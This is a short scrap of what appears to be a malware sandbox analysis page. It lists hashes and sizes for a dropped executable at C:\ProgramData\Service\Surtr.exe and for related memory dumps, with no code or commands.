d9188ea589f412fb797b5a00be60eb68

SHA1
b165b3d4853340af42f2d427cf30ee5746b784a4

SHA256
66bbc41ccccc8144174c947b94a7e8c3f1a2d868565087b938cfd06850e25f0f

SHA512
9f91f964ec3b9b6c46781475d266f6cf920c302f956a50b0f1f06a26068f7e67212a52adc8924428375273af9098e4f04add3f5d9563b0c416286356e70f30a9

Download Submit
C:\ProgramData\Service\Surtr.exe

Filesize
333KB

MD5
393e9f112cc999ebd9333877bcc7535e

SHA1
ed65581b6c3980b3ddf623a4d2f61ce08ce59bdf

SHA256
459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712

SHA512
021116a238f84e003ba6a5817b4d6ed27637ed6bc1d6d424533813d70964953c9deb1c62e94bae89db7c59f09dcc76ee5c92ad66c8e7688cd0d4643bc6d72c83

Download Submit
memory/4696-205-0x00007FF72FB20000-0x00007FF72FC81000-memory.dmp

Filesize
1.4MB

Download
memory/4696-133-0x00007FF72FB20000-0x00007FF72FC81000-memory.dmp

Filesize
1.4MB

Download